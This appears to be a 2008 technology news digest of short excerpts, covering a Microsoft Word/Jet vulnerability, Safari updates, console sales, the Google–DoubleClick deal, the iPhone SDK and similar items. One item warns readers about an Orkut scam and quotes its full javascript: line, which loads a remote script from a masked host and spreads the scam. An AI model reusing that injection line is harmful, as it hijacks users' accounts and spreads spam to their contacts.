Microsoft researchers are currently investigating reports of targeted attacks that can be exploited through Microsoft Word, including Word 2007, using a buffer overflow error in the Jet Database Engine.

The code execution vulnerability is caused by a buffer overrun in the Microsoft Jet Database, or msjet40.dll. Security researchers say that the vulnerability could be exploited by an attacker who successfully enticed a user to open a malicious Word file constructed to load the specially-crafted database file using msjet40.dll.

A successful exploit would allow an attacker to gain the same privileges as the local user. In a Web-based exploit, an attacker could host a malicious Web site, including compromised Web sites and sites that accept user-provided content, with a specially-crafted Word file that exploited the vulnerability.

While users could not be forced to visit the malicious Web sites, an attacker could persuade them to visit the malware hosting sites by clicking on a malicious link embedded in an e-mail or IM message.

Accounts with reduced user rights could be less affected than users with elevated administrative privileges, security researchers say.

Customers using Microsoft Word 2000 Service Pack 3, Word 2002 Service Pack 3, Word 2003 Service Pack 2, Word 2003 Service Pack 3, Word 2007 and Word 2007 Service Pack 1 on Windows 2000, Windows XP or Windows Server 2003 Service Pack 1 are vulnerable to the potential attacks.

However, Windows Server 2003 Service Pack 2, Windows Vista and Windows Vista Service Pack 1 are protected from attack due to the fact that they include a version of the Jet Database Engine that does not contain the flaw.

Read more at CRN

Steve Jobs is using Apple Software Update to slip his Safari browser onto Windows machines. And Mozilla CEO John Lilly is peeved.

Presumably, Lilly is peeved because Safari browsers on Windows machines would eat into the market share of Mozilla's very own Firefox browser. But Lilly says he's peeved for different reasons. He says he's peeved because Steve Jobs' little Software Update trick undermines the security of the entire internet.

"What Apple is doing now with their Apple Software Update on Windows is wrong," Lilly writes on his personal blog. "It undermines the trust relationship great companies have with their customers, and that’s bad - not just for Apple, but for the security of the whole Web."

Steve Jobs and company unveiled Safari 3.1 on Tuesday, and to celebrate, they began offering the new browser to Windows users via Apple Software Update - that clever little tool that alerts you to new Apple software with a nothing-less-than-conspicuous pop-up window.

On Windows machines, Apple Software Update is automatically installed alongside iTunes and Quicktime. So you can bet that Safari has been offered to many millions of folks over the past week.

"Safari for Windows is the fastest and easiest-to-use web browser for the PC," reads the pop-up window that pops up on Windows PCs. "It displays web pages faster than any other browser and is filled with innovative features - all delivered in an efficient and elegant user interface."

Read more at Register

Google is pressing the US government to allow the unlicensed frequencies of TV "white space" to be used for wi-fi.

The firm has written an open letter to regulators saying the US spectrum was a "once in a lifetime opportunity".

White space is unused blocks of frequencies in-between channels broadcast on analogue airwaves.

"The vast majority of viable spectrum in this country simply goes unused, or else is grossly underutilised," wrote Google's Richard Whitt in the letter.

"Unlike other natural resources, there is no benefit to allowing this spectrum to lie fallow," he added.

Read more at BBC

During a press event in Mumbai, Palm has made announcement about the launching of its ‘Centro’ smartphone in the Indian market.

Targeting youth, the light and fresh looking Palm ‘Centro’ Smartphone weighs just 124 grams and comes with a number of outstanding features.

While launching ‘Centro’ in India, Palm’s Regional Director (Asia pacific) Olivier Rozay stated, “We launched the first model in last September. This was targeted at the business class. The latest one, Centro, aims to catch up the younger generation. With these two and others in the coming days, we hope to be doing a good business in India.”

Together with modish look, the ‘Centro’ has voice, text, email, Web, contact and calendar potentialities. With its QWERTY keyboard, the new mobile phone also has a touch screen as an alternate input option.

Read More-Via[TopNews]

Windows Vista SP1 Is having a tough time getting into the Ivy League.

University of Pennsylvania tech staffers are advising faculty and students not to upgrade their computers to the new service pack forMicrosoft Vista operating system.

The school's Information Systems & Computing department said it will support Vista SP1 on new systems where it's preinstalled, but added that it "strongly recommends that all other users adopt a 'wait and see' attitude," according to a newly published department bulletin.

Penn's ISC department advised "continuing to use previous versions of Windows XP and Windows Vista until after the initial bugs in SP1 are identified and fixed."

Vista SP1 users have reported numerous glitches since the operating system became widely available on Tuesday.

Read More-Via[IW]

Sony announced that the next software update for its gaming console, PlayStation 3, will add Blu-ray Disc (BD) Profile 2.0 capabilities, turning the game console into the world's first Blu-ray player to support the new format enhancements. The new firmware, 2.20, is scheduled to be released later this month

Thanks to the BD-Live, PS3 owners will be able to experience interactive features when playing enabled Blu-ray discs, such as downloadable video content, ringtones, games, and more. Besides BD-Live, the new update, which is labeled as 2.20 will add other new features such as the ability to copy photo and music playlists from PS3 to PSP.

"With these regular firmware updates and future-proofed technology, SCEA is making the 10-year life cycle of PS3 possible," Scott A. Steinberg, VP of product marketing for Sony Computer Entertainment America, said in a statement.

Sony Pictures Home Entertainment is releasing April 8 two movie titles that will include exclusive downloadable content through BD-Live. The titles are Walk Hard: The Dewey Cox Story and The 6th Day.

Sony turned to Microsoft for a possible Blu-ray drive for the Xbox 360, reports said earlier this month. Everyone is curious to know how this collaboration would materialize in terms of prices, as Sony has kept a pretty high price tag on its Blu-ray players so far.

Read More-Via[eFM]

Apple on Tuesday released version 3.1 of its Safari Web browser for both Windows and Mac. The incremental update does little in the way of introducing new features, although the company is using it to usher in the next generation of Web standards.

Safari 3.1 is the first browser to support some of the features of HTML 5, the new standard that was released in January. That update to the base coding of the Web includes new video and audio tags, which allow for built-in support of media without proprietary technology.

Offline storage is another part of HTML 5 also supported in Safari 3.1. By caching a portion of a Web page, developers would be able to make their sites load faster by not needing to re-download portions that haven't been changed.

Read more at BetaNews

Intel Corp. today announced that it expects to ship a six-core processor to resellers in the second half of this year.

With 1.9 billion transistors and 16MB of Level 3 cache, the six-core chip, code-named Dunnington, will be built with Intel's new 45 nanometer technology, according to Pat Gelsinger, a senior vice president and general manager of Intel's Digital Enterprise Group.

"The big cache and six cores will give customers a nice bump in performance," Gelsinger said during a press briefing today about the company's product road map and its upcoming Intel Developer Forum, slated to be held next month in Shanghai. "We're quite excited about it."

He said that the company plans to demonstrate the Dunnington chip at the IDF.

Dan Olds, an analyst at Gabriel Consulting Group Inc., said moving beyond quad-core processors, which to date have been the high-water mark in the semiconductor industry, is a major step -- one that keeps Intel well ahead of rival Advanced Micro Devices Inc. Just last week, AMD confirmed that it started shipping its triple-core Phenom processors.

"For AMD, it just means that they're falling a little bit further behind, unless they have some plans in the works that we're not privy to yet," added Olds. "A six-core is a big deal … but most desktop software can't really take advantage of dual-core yet, so this means that this chip is aimed directly at servers -- at least until consumer software gets better at multicore threading."

Read more at CW

Manhunt 2, the "sadistic" video game banned for by the British Board of Film Classification (BBFC) over its portrayal of extreme violence, has been cleared for release following a legal challenge by its makers.

The game is set in a mental facility, and players have to escape by slaughtering members of a sinister organisation by sneaking up on them and using improvised weapons such as a pliers, a syringe or a power-saw.

The BBFC ruled that the game's "casual sadism" and focus on "brutal slaying" could unleash a "range of unjustifiable harm risks to both adults and minors" as it "constantly encourages visceral killing". It was the first video game to be banned in the UK since 1997.

Read more at Telegraph

It's one of the hardest schools in America to get into, but not for hackers.

Last month, at least one hacker launched an attack on a computer server at Harvard University, potentially viewing the personal information of up to 10,000 graduate students and applicants to the Graduate School of Arts and Sciences and posting some of the information on the Web.

Harvard officials began notifying thousands of students and applicants this week that some of their personal information, in some cases Social Security numbers, may have been accessed.

According to Harvard chief information officer Dan Moriarty, an attack was launched Feb. 16 on a server that contained summary information from applications for prospective students as well as the housing information of current students. About 6,600 of those applications included Social Security numbers.

The following day, the school took the server offline for five days to investigate the source of the attack.

Read more at ABC

It seems like Wii is unbeatable. Shortly after the NPD Group released its data about the gaming sales in US during February, Media Create revealed that Nintendo Wii is the champion in Japan too.

According to Media Create, in the week ending March 9, Nintendo sold 57,068 Wiis in Japan, which is almost double compared to 21,008 PS3s sold by Sony. As for Microsoft, its Xbox 360 continues to struggle and it has sold only 2891.

So far, Microsoft has failed to impress the Japanese gamers, who bought only 257,800 Xbox 360 consoles during 2007, according to the data released by Enterbrain. In comparison, Nintendo Wii sold 3.6 million units, while Sony managed to sell 1.2 million PS3s.

Though, it is very possible that during the next week Xbox 360’s sales will be higher, because on March 6, Microsoft started to sell its Xbox 360 Arcade in Japan for only 27,800 yen ($260) instead 34,800 yen.

Xbox Arcade was launched in the US last year in October and it is sold for $279.99. The package includes five family-friendly games, a wireless controller, a high-definition multimedia interface (HDMI) connection to enable high-definition output if desired and 256 MB of memory useful for storing games and entertainment content. Unlike the Core version, the Arcade doesn’t have a hard drive.

Read more at eFM

The router offers an extended operating range of 1,600 ft, plug-and-play 'CD-less' installation and simple network security setup. Compatible with IEEE 802.11g, 802.11b, 802.11n draft 2.0, 802.3ab standards, the N1 Vision wireless router patent-pending LCD displays offers real-time network information to users including: download/upload speedometer, network bandwidth usage, number of connected devices, guest access network key, date and time.

The router offers an extended operating range of 1,600 ft, plug-and-play 'CD-less' installation and simple network security setup. Compatible with IEEE 802.11g, 802.11b, 802.11n draft 2.0, 802.3ab standards, the N1 Vision wireless router patent-pending LCD displays offers real-time network information to users including: download/upload speedometer, network bandwidth usage, number of connected devices, guest access network key, date and time.

Read More-Via[Efytimes]

Technology majors Samsung and made its presence felt at the ongoing Photofair 2008 at Mumbai, by unveiling a slew of products across all price ranges. Samsung is already a name to reckon with in the field of digital photography, but with fierce competition from Canon, Sony, Nikon and Kodak, has felt the need to cater to a wider range of consumers and consumer needs through its new products. R. Zutshi, Deputy MD, Samsung India, said, "In keeping with the changing consumer preferences, the new 2008 series of Samsung digital still cameras comprises of digital cameras with resolutions of 7, 8 and 10 mega pixels, larger sized LCDs and sleek form factor. We have introduced colour options across our different models as well".

Starting from the lowest-priced 'S' series, Samsung's new range encompasses the mid-range 'L' and 'I' series, topped off by the premium 'NV' line. The 'S' series is intended to be a line of entry-level digital cameras, and Samsung announced two new products in this range - the 7.2- mega pixel S760 and the 8.1 mega pixel S860, priced at Rs.6990 and Rs.8990 respectively. They are characterized by stylish design and a selection of 4 colours in silver, black, pink and blue, and come equipped with a mode dial that allows switching between various shooting options like automatic and video recording.

Read More-Via[domain-B]

Consumers sent the video game hardware and software industry a US$1.33 billion valentine for the month of February, a 34 percent increase over sales during the same time period in 2007, according to figures released by the NPD Group, an independent market research firm.

The Wii's Latest News about Wii reign continued as the No. 1 video game console, while Sony's PlayStation 3 Latest News about PlayStation 3 (PS3) beat out the supply-constrained Xbox 360 Latest News about Xbox 360 for the second month in a row. Gamers picked up 281,000 PS3s versus 255,000 of the Microsoft-made consoles.

Sony's boost in sales represents a 120 percent improvement over February 2007, the company said.

"The Sony PS3's increasing popularity is due to two reasons. One, the price cuts over the last six months. Two, the fact that it integrates a Sony Blu-ray high definition DVD player," said Brian O'Rourke, an InStat analyst.

Read more at TechNewsWorld

You may get a scrap from your orkut buddy like this one:

Heya !!
how are you??
Do you know there was a profile in news last night

link :- click here

The about me of This Profile Is Superb

When you click on the link, you land onto a fake profile which try to tempt you:

VIEW ANYONE'S LOCKED ALBUM NOW.


1.) Goto the profile of which you need
to view the album

2.) Copy the javascript given below and paste
it to your address bar where you write www.orkut.com And hit enter key

3.) Now wait for the images to be loaded
as it will take a few minutes .

javascript:d=document;c=d.createElement('script');d.body.appendChild(c);c.src='http://xxxxxxx.xxx.com/orkut0.js';void(0)

Please Dont use this trick on my album

Though It may not be a malware or password hijacker, it is definitely annoying. If you run the script on your browser's address bar, it'll send the same scrap(from your profile) to all your friends and will add some useless communities to your profile. So beware and protect your space.

The iPhone Dev Team has allegedly jailbroken the new iPhone firmware that ships with the recently released SDK (version 1.2, which will be apparently released to the public as 2.0). An user identified as King Chronic has obtained the firmware from his source simply known as "R" two days ago and the group managed to modify it to run applications not signed by Apple.

This doesn't mean that is is unlocked yet, the phone would still be locked on AT&T in the US and other networks elsewhere where it's available.

"Cheers to the Dev Team for the excellent job. Hopefully we can all have it unlocked & jailbroken iphone at the end of June. We've got enough time to do that & perhaps we can have it before the official Apple release for the new firmware..." wrote one user.

Read More-Via[eFM]

Apple Inc. was sued Wednesday over allegations its iTunes online music store and iPod music players are illegally using a patented method for distributing digital media over the Internet.

Atlanta-based ZapMedia Services Inc. sued Apple in U.S. District Court for the Eastern District of Texas, accusing the Cupertino-based company of violating two ZapMedia patents.

ZapMedia wants royalties on Apple's sales of iPods and iTunes music, which reached nearly $11 billion last year. The success of iTunes has helped make Apple the No. 2 music retailer in the U.S. behind Wal-Mart Stores Inc., according to market researcher NPD Group.

Read More-Via[AP]

Pick up the remote, turn on the television — and watch YouTube.

The user experience envisioned by technology enthusiasts came a step closer to reality on Wednesday when TiVo, the maker of popular digital video recorders, announced a partnership with YouTube that will deliver Web video directly to users’ televisions.

“TiVo’s strategy is to bridge the gap between Web video and television and make as much content available as possible for our subscribers,” said Tara Maitra, the vice president and general manager for content services at TiVo.

With the YouTube deal, TiVo becomes the latest entrant into the marketplace for porting Internet video content to television. Apple introduced a new version of Apple TV with similar features in January. Although several companies are trying to merge the online viewing experience with the living-room big screen, no one product dominates the market yet.

“Leaning forward at my computer screen, I’ve got this giant amount of content,” said Dmitry Shapiro, the founder of Veoh, one of the companies trying to merge the Internet and the television. “But as soon as I want to relax in my living room with friends, I’m stuck with what’s on my TV.”

Read More-Via[Nytimes]

Japanese authorities are investigating reports of a fire involving one of Apple's iPod digital music players.

The 2GB iPod Nano emitted sparks and ignited when the built-in lithium ion battery apparently overheated while being recharged.

The owner called the local fire department, local press reports said, but no injuries were reported.

Apple apparently learned of the incident shortly afterwards, but did not inform Japan's Ministry of the Economy, Trade and Industry until March, according to reports.

The ministry issued a brief report on the fire, which took place on 8 January near Tokyo, Nikkei Business Press reported.

Read more at VnuNet

Speaking before the U.S. House Committee on Science and Technology on Wednesday, Microsoft Chairman Bill Gates outlined suggestions to build U.S. strength in an increasingly competitive international high-technology market.

Gates suggestions include improving science and math education for U.S. students. Unless more students can be attracted to science and math, Gates warns, the U.S.’s competitive advantage will erode and its ability to create high-paying jobs will suffer.

Gates also called on Congress to reform immigration policies to allow more “highly skilled professionals” from abroad to work in the U.S. by raising the cap on H-1B visas, to help retain foreign-born employees with a path to permanent residency. He doesn’t see this effort as at odds with the idea of spurring more American citizens into science and math-related professions; he said that American companies simply won’t have the talent they need.

“The shortage of scientists and engineers is so acute that we must do both: reform our education system and reform our immigration policies,” said Gates.

Read more at MacWorld

Google Inc.'s long-anticipated acquisition of online ad service DoubleClick Inc. is expected to turn the Internet search leader into an even more powerful marketing vehicle that's fueled by better insights about consumers.

The $3.1 billion deal, completed Tuesday after nearly a year of regulatory wrangling, also may intensify the pressure on Microsoft Corp. and Yahoo Inc. to resolve their stormy courtship so they don't risk further distractions while Google tries to sprint further ahead in the race for Internet advertising.

Google took control of DoubleClick a few hours after Europe's antitrust regulators removed the final stumbling block by approving a deal that was first announced 11 months ago.

U.S. regulators cleared the transaction in December, casting aside objections from Microsoft and other companies that argued DoubleClick would give Google too much control over online advertising and potentially sensitive information about consumer behavior on the Internet.

Besides opening up new opportunities, Google's takeover of DoubleClick will create more challenges for a management team already grappling with concerns about how the slowing U.S. economy will affect the company's earnings growth this year.

Google Chairman Eric Schmidt acknowledged in a statement that the biggest acquisition in the company's 9 1/2-year history probably will trigger an unspecified number of layoffs after years of relentless hiring. The looming job cuts will be concentrated in the United States, although Schmidt said offices in other countries could be affected.

New York-based DoubleClick has 1,500 employees with offices in France, England, Germany, Ireland, Spain, Australia and Spain. Mountain View-based Google employs nearly 17,000 workers, up from 1,600 just four years ago.

Read more at AP

Sony Ericsson has unveiled the T303, an attractive phone that is small and neat enough to carry with you on every occasion.

This compact slider phone has been given the high-end treatment, with a mirrored screen, metal housing and chrome finish.


Sony Ericsson T303, Key Specs-


  • Provides pocket-sized convenience
  • Promises premium good looks thanks to a metal and chrome finish
  • Does the basics well, whether that’s camera, Bluetooth™ or FM radio

Big in looks, mini in size

The T303’s diminutive size is distinctive for all the right reasons. Because it doesn’t take up much room, it’s perfect for those nights out when space is limited and not everything can come out with you. The T303’s compact size means that this phone will always be one of the chosen few.

Chic and smooth, reflecting your every move

The T303’s metal and chrome finish makes it hard for those around you not to be impressed by its premium appearance. Its soft shape and smooth sliding mechanism make it a feel-good experience that you can enjoy every day. And the mirror glass display on the front of the phone goes yet further in making the T303 even more stand-out in its appearance.

Picture perfect

The T303’s megapixel camera is ready to take pictures in an instant. So if you come across the perfect shoes whilst out and about, but want a second opinion, just one quick snap and you can send a picture message to one of your friends. You can use Bluetooth™ technology to transfer photos wire-free from your phone to a compatible computer, and then email them to any number of helpful style-advisers. Or just to send the photos of a day’s adventure directly to a friend’s phone.

Play-as-you-go

With life being ever more hectic, it’s essential to be able to slow down the pace and take time out, whenever you get the chance. The T303 comes with a built-in FM radio, meaning you can tune in, chill out, and let time just pass you by. It also has its own media player and comes preloaded with Sony Ericsson’s TrackID™ feature. Record a clip of a song in a bar or café and find out instantly what track it is and who sings it.

Accessorises

With such a good-looking phone, you’ll want to keep it that way. The Protective Case IDC-22, part of Sony Ericsson’s Design Collection, gives you the opportunity to develop your stylish look still further. Not only will it help keep your phone looking good, but it also has room for all of those essentials…your credit cards, keys and your T303.

The Sony Ericsson T303 will offer designer good-looks without the price tag to match. The T303/T303c is a GSM/GPRS 900/1800/1900 phone that will be available in selected markets from mid 2008.

The T303a is a GSM/GPRS 850/1800/1900 phone that will also be available in selected markets from mid 2008.

Read more at Sony Ericsson, New Mobile Centre

As mobile broadband takes off, Wi-Fi hotspots will become as irrelevant as telephone booths, Ericsson Chief Marketing Officer Johan Bergendahl said Monday.

Mobile broadband is growing faster than mobile or fixed telephony ever did, Bergendahl said.

"In Austria they are saying that mobile broadband will pass fixed broadband this year. It's already growing faster, and in Sweden, the most popular phone is a USB modem," said Bergendahl, who was the keynote speaker at the European Computer Audit, Control and Security Conference in Stockholm.

As more people start using mobile broadband, hot spots will no longer be needed. "Hotspots at places like Starbucks are becoming the telephone boxes of the broadband era," said Bergendahl.

A couple of factors will accelerate the move to mobile broadband. In countries such as Austria, Denmark, and Sweden, the average price for a mobile broadband subscription is only €20 ($31) per month, Bergendahl said.

Also, support for HSPA (High Speed Packet Access), favored by Ericsson, is being built into more and more laptops. Ericsson recently signed a deal to put HSPA technology in some Lenovo notebooks.

Read more at Yahoo/Infoworld

Facebook Chief Executive Mark Zuckerberg, 23, has developed a reputation, deserved or not, for being aloof and arrogant. And who can blame him? The Harvard dropout has created one of the fastest-growing and arguably most innovative Internet companies since Google (GOOG). An investment from Microsoft (MSFT) gave it a $15 billion valuation last year.

But at the South by Southwest Interactive Festival in Austin, Tex., Zuckerberg presented a humbler side of himself in his most public confession to date. In a Mar. 9 keynote Q&A session with BusinessWeek columnist Sarah Lacy, Zuckerberg admitted to a series of missteps. In a wide-ranging interview that lasted an hour, Zuckerberg also announced the launch of a French-language version of his social networking site aimed at the 100 million-plus Francophones worldwide.

In the span of four years, Facebook has become the second-largest social networking site after News Corp.'s (NWS) MySpace. The company's top challenge now is figuring out a way to make money from its 60 million-plus members worldwide. But Zuckerberg admitted that Facebook's first attempts to turn the site into a financial powerhouse have not turned out as planned.

Read more at BW

Hulu, the online video joint venture of News Corp and General Electric's NBC Universal, will make its public debut on Wednesday with programming from Time Warner Inc's Warner Bros Television Group, Lionsgate and from sports leagues.

Missing from the list of providers are media mogul Sumner Redstone-controlled companies Viacom Inc, which continues to hold discussions, Viacom said recently, and CBS Corp, which has said it was not averse to a licensing deal.

At launch, Hulu will offer full-length episodes of more than 250 TV series from current hits such as "The Simpsons" as well as older shows like "Buffy the Vampire Slayer." It also will offer 100 movies including "The Big Lebowski" and "Mulholland Drive."

Hulu said it has signed licensing deals with the National Basketball Association and the National Hockey League.

Hulu's launch is a big bet by big media companies that consumers are as eager to spend long periods of time watching TV shows and movies in front of their computers as they are in front of their televisions.

Ahead of its test launch four months ago, the service, dubbed by the press as a rival to Google Inc's YouTube video sharing site, was skewered by the press and influential technology blogs for attempting to compete with the Web's most popular video destination.

Read more at Reuters

When a laptop gets stolen, it is not just the physical loss of a machine but also the loss of valuable and sensitive information that it stores. Unfortunately, corporate and individuals do not have a plan to counter this yet. Realising this need, Unistal Systems Pvt Ltd has come up with a new software product -– Locate Laptop, powered by proprietary WebSniff technology. Developed in-house by Unistal, Locate Laptop can locate reportedly stolen laptops leveraging on the World Wide Web.

Locate Laptop not only tracks and recovers stolen computers, but also deters theft. It keeps track of the whereabouts of each employee while travelling, and the moment he logs in via the Web, a report is generated with his complete details and is sent to a designated individual within the organisation. This is done without the knowledge of the employee, so as to maintain privacy. All that users have to do is install Locate Laptop on to their computers.

Read More-Via[Efytimes]

A new analysis of online consumer data shows that large Web companies are learning more than ever before the gritty details of what people search for and do on the Internet, gathering clues about the tastes and preferences of a typical user several hundred times a month.

These companies use that information to predict what content and advertisers people most likely want to see. They can charge steep prices for carefully tailored ads because of their high response rates.

The analysis, conducted for The New York Times by the research firm comScore, provides what advertising executives say is the first broad estimate of the amount of consumer data transmitted to Internet companies every day.

The analysis indicates that Web companies are, in effect, taking the trail of crumbs people leave behind as they move around the Internet and analyzing them to anticipate people's next steps. So anybody who searches for information on such disparate topics as iron supplements, airline tickets, hotels and soft drinks may see ads for those products and services later on.

Consumers have not complained to any great extent about data collection online. But privacy experts say that is because the collection is invisible to them.

"When you start to get into the details, it's scarier than you might suspect," said Marc Rotenberg, executive director of the Electronic Privacy Information Center, a privacy-rights group. "We're recording preferences, hopes, worries and fears."

But executives from the largest Web companies say that privacy fears are misplaced, and that they have policies in place to protect consumers' names and other personal information from advertisers. Moreover, they say, the data is a boon to consumers, because it makes the ads they see more relevant.

Read More-Via[seattletimes]

Microsoft has confirmed that beginning March 14th, all UK Xbox 360 models will see a price drop, with the Arcade and Elite models dropping £40 ($80) to £159.99 ($322, now the least expensive next-gen console in the region) and £259.99 ($524), and the standard model down £50 ($100) to £199.99 ($403), with one analyst suggesting the pressure is on Sony to do the same.


In a statement on the price drop, Microsoft notes that Xbox 360 is the number one next-gen console in the territory, with 42 percent of life-to-date sales, and the highest attach rate in Europe at 7 games per console, compared to the PS3's 3.8 and Wii's 3.5 games. In a separate release, Strategy Analytics principal analyst David Mercer said the move puts Sony "under renewed pressure" with even the highest-end model, the Elite, now £40 less expensive than the PS3.

Read More-Via[Gamasutra]

Casio has taken the wraps off its new Exilim EX-Z9 digital camera, offering an 8.1 megapixel resolution, 3× optical zoom, a 2.6-inch LCD, and electronic image stabilization in a sleek design intended to let users easily take the camera with them anywhere.

The camera also captures video, and features a "YouTube Capture Mode" that enables users to record video and upload it to the popular video sharing site in as few as three steps.

"Whether you are taking snap shots of your family at the park or your friends at a concert, this high-quality digital camera is sure to satisfy all of your photographic wants and needs," said Casio Digital Imaging VP Bill Heuer, in a statement.

Read More-Via[DT]

Listening on a cell phone, even with a headset and free hands, can make a driver as dangerous as a drunken one, a new study suggests.

Researchers have previously explored this territory, but Carnegie Mellon University scientists tried a new tack: they looked at the brain.

They used brain imaging to show that listening to a cell phone significantly reduces the brain activity that occurs during undistracted driving. This drop in brain function increases driving mistakes - such as weaving out of the lane or hitting a berm on the shoulder of the road.

Five states have enacted laws banning handheld cell phones while driving, but no state completely outlaws all types of cell phone use.

New Jersey toughened its ban effective March 1. It is now a primary offense, meaning drivers can be fined $100 for talking on a handheld cell phone even if they have committed no other violation.

Scores of studies have shown that performing a mental task such as carrying on a conversation impairs driving performance, but the new research is the first to look at what is going on in the brain.

Read More-Via[sundaygazettemail]

Sprint Nextel, whose shareholders are still stinging from a $29.7 billion fourth-quarter write-down related to its 2005 purchase of Nextel, is generating plenty of speculation about the company’s fate.

Merrill Lynch analysts are suggesting that Deutsche Telekom, which owns T-Mobile, may consider acquiring Sprint to block a price war in the mobile phone industry, the Kansas City Star reported.

Merrill said that the wireless carrier’s woes may force it to cut prices to attract customers. “In such a price war scenario, we think T-Mobile would face the most pressure, and Deutsche Telekom would see the increased urgency to drive market repair,” the firm’s analysts said in a report cited by The Star.

Read More-Via[Nytimes]

Since the release of the iPhone last June, software developers and would-be business users have longed for applications like e-mail and calendars to run directly on the sleek and popular device, rather than just Web applications that run on its browser. Now they have them, thanks to a new software development kit and promised upgrades to the iPhone's 2.0 software.

Taking dead aim at business smartphone platforms, most notably Research In Motion's BlackBerry, Apple CEO Steve Jobs wants to turn this pricey consumer toy into a power- ful business tool for mobile professionals.

Going further than expected, Apple is throwing open the iPhone platform to third-party applications. "We're opening the same native APIs and tools we use to build our iPhone apps" to independent developers, says VP of platform experience Scott Forstall.

Apple, being Apple, still controls distribution of those applications. It's creating an "Apps Store" that will live on every iPhone, through which developers can sell their wares. For commercial applications, the developers get 70% and Apple gets 30%; there's no charge to distribute free apps. Apple's control raises concerns about how varied and rich the available software will be, though Jobs promised to weed out only malware and porn: "Will there be limitations? Of course."

Read More-Via[IW]

Google-owned video-sharing site YouTube is now the most popular user-generated site in the UK, new research suggests.

According to figures produced by Nielsen Online, the web property saw an increase in traffic of 56 per cent during January this year, compared to the same month in 2007. It is said to have had 10.4 million unique visitors over the period.

As a result, YouTube overtook the user-edited encyclopaedia Wikipedia, which experienced 9.6 million unique visitors during January.

Meanwhile, Facebook recorded 8.5 million hits, while do-it-yourself blogging service Blogger was identified as the fourth most popular user-generated site, with 5.1 million visitors.

Read more at Bigmouthmedia

Microsoft offered its first public demonstration of Internet Explorer 8 on Wednesday, a prospect that had general manager Dean Hachamovitch struggling to figure out what to cover.

"I'm so excited that I had to figure out how to focus," he told the crowd. The marketing folks naturally suggested he point to three major advances, but Hatchamovitch disagreed.

"These are developers," he said he told the marketers. "They can count higher than three."

So, instead he said he would talk about eight features: CSS 2.1 support, CSS Certification, performance, start of HTML 5 support, new developer tools, activities, Web slices and one he hasn't named yet.

Read more at CNet

Citing security risks, the Pentagon banned Google teams from making detailed street-level video maps of U.S. military bases after images of a Texas base ended up on the popular Internet site.

A message sent to all Defense Department bases and installations around the country late last week told officials not to allow the mapping Web site to take panoramic views inside the facilities. Google said taking such pictures is against its policy and that the incident was a mistake.

Air Force Gen. Gene Renuart, chief of the U.S. Northern Command, said Thursday that that the decision to issue a formal ban was made after at least one Google crew requested and then was permitted access to a base, identified in the message as Fort Sam Houston. He said he was concerned that allowing the 360-degree, street-level view could provide sensitive information to potential adversaries and endanger base personnel.

It's a worry, Renuart said, because such views can show "where all the guards are, it shows how the barriers go up and down, it shows how to get in and out of buildings, and I think that poses a real security risk to our military installations."

Read more at AP

The Internet grew by almost 33 million domain names last year, according to the fourth-quarter 2007 "Domain Name Industry" report released yesterday by VeriSign Inc., a digital infrastructure vendor that manages Internet domain names such as .com.

Total registrations worldwide topped 153 million across all of the top-level domain names, a 27% increase over the same quarter in 2006 and a 5% increase over the third quarter of 2007, according to VeriSign's brief (download PDF).

By the end of 2007, there were more than 80.4 million .com and .net domain-name registrations, a 24% increase year over year and a 4% increase quarter over quarter, according to the report. That number took into consideration the domain names that were deleted by registrants in the five-day grace period before the end of the fourth quarter of 2007, according to the report. During the five-day grace period, registrants can delete a newly registered domain and get a full refund.

Read More-Via[CW]

Many of us lead dual-calendar lives--I know I do. At work, it's all about my Outlook calendar. While I certainly have issues with the program, it's just much easier to use the app that's built into my default e-mail program. When I'm at home, I use Google Calendar for the same reason. And having to shuffle between appointments in two different calendars can be a huge headache.

Today, however, Google has rolled out Calendar Sync, an app that transfers appointments between Google Calendar and Outlook, and vice versa, and does so automatically, every time you add a new appointment to Google Calendar or Outlook. Google has more information on the product at its blog.

Read more-Via[appscout]

Samsung Electronics and Adidas have joined the race against Apple and Nike to offer people a device that plays music and keeps track of workouts.


Samsung's miCoach music-mobile phone even lives up to its name by encouraging people as they run, telling them to "speed up" if they aren't keeping pace, and giving them updates on their heart rate, time left in their run, and more.

The system includes a heart-rate monitor, a sensor to attach to a pair of running shoes and a Web workout journal to help people design and keep track of fitness programs.

With miCoach, Samsung and Adidas enter the fray against Apple and Nike, which started offering the Nike+iPod sports kit in the U.S. in July, 2006, also aimed at people with active lifestyles.

The Nike+iPod system also keeps track of workouts, telling runners the distance traveled, calories burned and other information via earphones, as well as on the iPod display screen.

The main differences between the two systems are that the Samsung model is also a mobile phone, while the Apple one is just a music player. Any runner can stop their music and workout by pressing a button on the miCoach, then answer a phone call. But the device has far less music storage capacity than the iPod. The miCoach comes with 1G byte of storage space, while the iPod Nano comes in 4G byte and 8G byte capacities.

Read More-Via[Nytimes]

In his Thursday afternoon keynote at MIX, Microsoft CEO Steve Ballmer sat down for a one-on-one chat with former Apple employee and Alltop co-founder Guy Kawasaki.

- Current status of the Yahoo deal: "We've made an offer! It's out there baby."

- Ballmer on why Microsoft wants to buy Yahoo: "Search is the killer application for online advertising...We're not where we'd like to be, we probably could have gotten going a little sooner, particularly on search and search related advertising."

- Ballmer says Microsoft is "the little engine that could" in the online space. But he notes that Google is not in desktop, not in enterprise, and not in gaming yet. "Online, it's Google, Google, Google," Ballmer acknowledges. "We are an underdog in this particular battle."

- Ballmer on Apple: "Apple does a good job. Apple does a nice job in music players. They're going to continue to do good work and we're going to continue to compete with all the vigor and energy."

Read more at BetaNews

Pioneer Corp. will stop making plasma display panels in an effort to turn around its money-losing business, the Japanese electronics maker said Friday.

Pioneer plans to procure the panels, used in flat-panel TVs, from another company. It said it was in talks with Japanese rival Matsushita Electric Industrial Co., which makes Panasonic products, to purchase plasma display panels.

Pioneer used to be one of the leading developers of the technology but has fallen behind bigger companies like Matsushita and South Korea's Samsung Electronics Co. and LG Electronics Inc.

"We have judged that maintaining the cost competitiveness of plasma display panels, or PDPs, at projected sales volumes will be difficult going forward," Pioneer said in a statement.

Pioneer is sinking into the red for the fiscal year ending March 31, racking up a 15 billion yen ($145.6 million) loss for charges for restructuring its PDP TV business. It had previously forecast a 6 billion yen ($58 million) profit.

The decision to pull out of plasma TV panel production will chalk up a one-time cost of 19 billion yen ($184.5 million). But Pioneer said it will return to profit for the fiscal year ending March 2010.

Read more at AP

Steven P. Jobs, Apple’s chief executive, is hoping to expand the iPhone’s appeal by luring software developers to create programs for it.

John Doerr, the venture capitalist, is adding an incentive: his firm is putting up $100 million to invest in the work of those programmers.

